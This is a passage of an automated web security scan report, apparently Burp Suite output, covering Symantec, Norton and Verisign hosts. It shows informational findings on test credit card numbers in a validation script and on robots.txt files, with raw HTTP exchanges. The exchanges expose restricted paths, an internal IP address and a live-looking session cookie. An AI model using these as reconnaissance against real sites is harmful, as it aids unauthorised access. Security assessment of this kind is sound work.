HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <body onload="pruneHeaders();resetForms(); cs_loadClusters('site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.107 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1', cs_drawClusters); " dir="ltr">...[SNIP]...
19. Credit card numbers disclosed
previous
next
There are 2 instances of this issue:
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/js/commonValidation2-9-06.js
Issue detail
The following credit card number was disclosed in the response:
Request
GET /renewals/js/commonValidation2-9-06.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 32366 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes // $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $ //please do not make changes to this file! //if you need to modify it, please make a copy, since this script is used by multipl...[SNIP]... Reverse(n); var total = AddedTogether(reversed); if(total % 10 > 0) { return 0; } return 1; } // Mod10() function CheckTestCard(n) { isTest = false; if (n == ("4567765445677654" || "4321123443211234 ")) { isTest = true;} return isTest; } // CheckTestCard function ValidateCC(formContents) { ccNumberChecked = StripNonDigits(formContents); ccType = GetType(ccNumberChecked); ccNumb...[SNIP]...
19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
GET /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 720962 Last-Modified: Thu, 08 Oct 2009 21:38:05 GMT ETag: "b0042-4ace5bbd" Accept-Ranges: bytes Content-Type: application/pdf Cache-Control: public, max-age=2171 Date: Fri, 09 Sep 2011 21:47:13 GMT Connection: close %PDF-1.4%.... 115 0 obj<</Linearized 1/L 704881/O 117/E 187596/N 20/T 702538/H [ 916 745]>>endobj xref115 310000000016 00000 n 0000001661 00000 n 0000001763 00000 n 0000002280 0...[SNIP]... 645 549 504 632 670 276 437 583 511 797 664 0 563 663 585 550 518 648 580 832 0 527 0 0 0 0 0 431 0 510 546 458 546 491 327 508 551 258 258 487 258 816 551 520 546 546 367 446 340 551 459 689 457 462 439 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 250 408 408 0 0 969 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 799 0 0 0 0 453]/BaseFont/IVAHPG+SymantecSansLight/FirstChar 32/ToUnicode 80 0 R/Encoding/WinAnsiEncoding/Type/Font>...[SNIP]...
20. Robots.txt file
previous
next
There are 47 instances of this issue:
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
20.1. http://1168.ic-live.com/goat.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://1168.ic-live.com
Path:
/goat.php
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: 1168.ic-live.com
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:17 GMT Server: Apache Last-Modified: Mon, 08 Aug 2011 21:54:33 GMT ETag: "37843a-72f-4aa057e0a3840" Accept-Ranges: bytes Content-Length: 1839 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/plain X-Cache: MISS from i2a-coll-7 X-Cache-Lookup: MISS from i2a-coll-7:80 Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21) Connection: close ...User-agent: * Disallow: /allCountryCodes.txt Disallow: /altidconv.php Disallow: /backup/ Disallow: /bugs-dec16.tar Disallow: /cgi-bin/ Disallow: /checktime.php Disallow: /client-kit/ Disallow: /com...[SNIP]...
20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://admin.instantservice.com
Path:
/resources/smartbutton/5851/42379/available.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: admin.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.3. https://admin.instantservice.com/links/5851/14753
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://admin.instantservice.com
Path:
/links/5851/14753
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: admin.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/authweb/global/assets/shared/images/nav/nav_grad.png
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: blogs.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Apache Last-Modified: Wed, 05 Mar 2008 18:53:14 GMT ETag: "1a6035a-21-221fba80" Accept-Ranges: bytes Content-Length: 33 Content-Type: text/plain; charset=UTF-8 Connection: close User-agent: * Disallow: /stooge/
20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy-static.norton.com
Path:
/estore/images/master/misc/gradient_background.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy-static.norton.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a Last-Modified: Mon, 23 Aug 2010 19:28:11 GMT ETag: "1f84c4-1c-48e82a62248c0" Accept-Ranges: bytes Content-Length: 28 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:31:19 GMT Connection: close User-agent: * Disallow: /
20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://buy-static.norton.com
Path:
/estore/images/en/Non-Product/Misc/LiveChat/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy-static.norton.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a Last-Modified: Fri, 20 Aug 2010 19:33:33 GMT ETag: "5e44c4-1c-48e465fcd7d40" Accept-Ranges: bytes Content-Length: 28 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:37:23 GMT Connection: close User-agent: * Disallow: /
20.7. http://buy.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy.norton.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:31:16 GMT Content-Length: 34 Content-Type: text/html X-Powered-By: Servlet/2.5 JSP/2.1 User-agent: * <br>Disallow: / <br>
20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/trust-seal/css/hp.css
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: cdn.verisign.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "29ac2fd-9eb-49a38fa8970c0" Accept-Ranges: bytes Content-Type: text/plain Age: 3946 Date: Fri, 09 Sep 2011 21:26:14 GMT Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Expires: Sun, 09 Oct 2011 20:20:28 GMT Content-Length: 2539 Connection: close User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: cdn.verisign.com
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/plain Connection: close ETag: "28e934c-9eb-49a38fa8970c0" Accept-Ranges: bytes Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 2539 User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.10. http://ch.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ch.norton.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ch.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain;charset=UTF-8 Cache-Control: public, max-age=14107 Date: Fri, 09 Sep 2011 21:41:25 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.11. http://com-verisign.netmng.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: com-verisign.netmng.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:40 GMT Server: Apache/2.2.9 Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT ETag: "1c44a1-1a-48391ee477680" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.12. http://community.norton.com/norton/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/norton/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: community.norton.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Last-Modified: Fri, 09 Sep 2011 07:04:51 GMT ETag: "82786-17b-4ac7ccb32122c" Accept-Ranges: bytes Content-Length: 379 Vary: Accept-Encoding Connection: close Content-Type: text/plain # Default Generated robots.txt file User-agent: * Crawl-delay: 5 Disallow: /t5/forums/forumtopicprintpage Disallow: /t5/ideas/ideaprintpage Disallow: /t5/blogs/blogarticleprintpage Disallow: /t5/help...[SNIP]...
20.13. http://de.community.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://de.community.norton.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: de.community.norton.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:49 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Last-Modified: Fri, 09 Sep 2011 02:17:05 GMT ETag: "35c1329-199-4ac78c6034a40" Accept-Ranges: bytes Content-Length: 409 Vary: Accept-Encoding Connection: close Content-Type: text/plain # Default Generated robots.txt file User-agent: * Crawl-delay: 5 Disallow: /t5/forums/forumtopicprintpage Disallow: /t5/ideas/ideaprintpage Disallow: /t5/blogs/blogarticleprintpage Disallow: /t5/help...[SNIP]...
20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://drh.img.digitalriver.com
Path:
/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: drh.img.digitalriver.com
Response
HTTP/1.0 200 OK ETag: "49-3ebbc10b" Content-Type: text/plain Last-Modified: Fri, 09 May 2003 14:54:03 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=94643838326,0) Content-Length: 73 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb04@dc1app59 Accept-Ranges: bytes Date: Fri, 09 Sep 2011 21:41:50 GMT Connection: close User-agent: Ultraseek Disallow: / User-agent: Inktomi Search Disallow: /
20.15. http://gs.instantservice.com/geoipAPI.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://gs.instantservice.com
Path:
/geoipAPI.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: gs.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:15:35 GMT ETag: "21f297-1a-84ebdfc0" Accept-Ranges: bytes Content-Length: 26 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=ISO-8859-1 User-agent: * Disallow: /
20.16. http://investor.symantec.com/phoenix.zhtml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://investor.symantec.com
Path:
/phoenix.zhtml
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: investor.symantec.com
Response
HTTP/1.0 200 OK Content-Length: 499 Content-Type: text/plain Last-Modified: Fri, 09 Sep 2011 12:00:00 GMT Accept-Ranges: bytes ETag: "03eb00e86ecc1:3239" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Expires: Fri, 09 Sep 2011 21:42:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:42:04 GMT Connection: close # ========v2.7 - 1/20/11=========================# # =====Block all bots except below entries between 8am and 8pm EST=====# User-agent: fusionbot Disallow: /preview Disallow: /redesign Disallow...[SNIP]...
20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: knowledge.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache Last-Modified: Wed, 01 Jun 2011 21:13:13 GMT ETag: "b690c1-3c-4a4acfd02ec40" Accept-Ranges: bytes Content-Length: 60 Connection: close Content-Type: text/plain User-agent: gsa-crawler Allow: / User-agent: * Disallow: /
20.18. https://knowledge.verisign.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/favicon.ico
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: knowledge.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache Last-Modified: Wed, 01 Jun 2011 21:12:44 GMT ETag: "34ceb-3c-4a4acfb486b00" Accept-Ranges: bytes Content-Length: 60 Connection: close Content-Type: text/plain User-agent: gsa-crawler Allow: / User-agent: * Disallow: /
20.19. http://l.addthiscdn.com/live/t00/200lo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://l.addthiscdn.com
Path:
/live/t00/200lo.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: l.addthiscdn.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT ETag: "df8ab7-1b-4a51dabdf10c0" Content-Type: text/plain; charset=UTF-8 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 27 Connection: close User-agent: * Disallow: *
20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/ubox/image
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: mbox3.offermatica.com
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: text/plain Date: Fri, 09 Sep 2011 21:24:34 GMT Accept-Ranges: bytes ETag: W/"25-1309299047000" Connection: close Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT Content-Length: 25 User-agent: * Disallow: /
20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://om.symantec.com
Path:
/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: om.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT ETag: "1a8177-18-6e161ac0" Accept-Ranges: bytes Content-Length: 24 xserver: www606 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow:
20.22. http://partnerlocator.symantec.com/public/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: partnerlocator.symantec.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:42 GMT Content-Type: text/plain Content-Length: 26 Last-Modified: Fri, 05 Feb 2010 14:46:53 GMT Connection: close Accept-Ranges: bytes User-agent: * Disallow: /
20.23. http://player.ooyala.com/player.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: player.ooyala.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Sun, 07 Aug 2011 04:04:05 GMT X-Ooyala-Server-Id: i-cfd6a4a3 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 184 Connection: close # This robots.txt is only for api.ooyala.com and backlot.ooyala.com. It should not be used for www.ooyala.com. User-agent: * Disallow: / Allow: /backlot/web Allow: /syndication/google
20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://productadvisor.symantec.com
Path:
/app/en/US/adirect/symantec
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: productadvisor.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:12 GMT Server: Apache/2.2.8 (Unix) Last-Modified: Thu, 19 Nov 2009 20:25:26 GMT ETag: "518003-273-478bf28d55980" Accept-Ranges: bytes Content-Length: 627 Connection: close Content-Type: text/plain User-agent: * Disallow: /*cmd=catCompare Disallow: /*cmd=symExtCatProductCompare Disallow: /*cmd=catProductDetail Disallow: /*cmd=symExtCatProductDetail Disallow: /*cmd=ProductPricer Disallow:...[SNIP]...
20.25. https://products.geotrust.com/signup/codesign.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.geotrust.com
Path:
/signup/codesign.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: products.geotrust.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:16 GMT Content-Length: 26 Content-Type: text/plain User-agent: * Disallow: /
20.26. https://products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: products.verisign.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:28:04 GMT Content-Length: 26 Content-Type: text/plain X-Powered-By: Servlet/2.5 JSP/2.1 User-agent: * Disallow: /
20.27. http://query.verisign.ch/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:46:20 GMT Connection: close User-agent: * Disallow: /
20.28. http://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:09 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:26:09 GMT Connection: close User-agent: * Disallow: /
20.29. https://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: query.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:22 GMT Content-Type: text/plain Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:46:22 GMT Connection: close User-agent: * Disallow: /
20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rs.instantservice.com
Path:
/resources/smartbutton/5851/II3_Servers.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: rs.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.31. http://searchg.symantec.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://searchg.symantec.com
Path:
/search
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: searchg.symantec.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:30 GMT Content-Type: text/plain Last-Modified: Mon, 25 Apr 2011 16:15:31 GMT Content-Length: 26 Cache-Control: public, max-age=2592000 Expires: Sun, 09 Oct 2011 21:33:30 GMT Connection: close User-agent: * Disallow: /
20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ssl-certificate-center.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=35E8520EDB2D10DB64618BD14E31479C; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ssl-certificate-center.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:45 GMT Server: Apache Set-Cookie: TLTHID=36B3AC56DB2D10DB49F6B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.34. https://symantec-corporation.com/servlet/campaignrespondent
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/servlet/campaignrespondent
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: symantec-corporation.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT Server: Apache Last-Modified: Wed, 25 Aug 2010 22:10:50 GMT ETag: "4500a0-1a-48ead277f8e80" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: * Disallow: /
20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://symantec.tt.omtrdc.net
Path:
/m2/symantec/mbox/standard
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: symantec.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: text/plain Date: Fri, 09 Sep 2011 21:31:00 GMT Accept-Ranges: bytes ETag: W/"25-1309299047000" Connection: close Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT Content-Length: 25 User-agent: * Disallow: /
20.36. https://test-products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://test-products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: test-products.verisign.com
Response
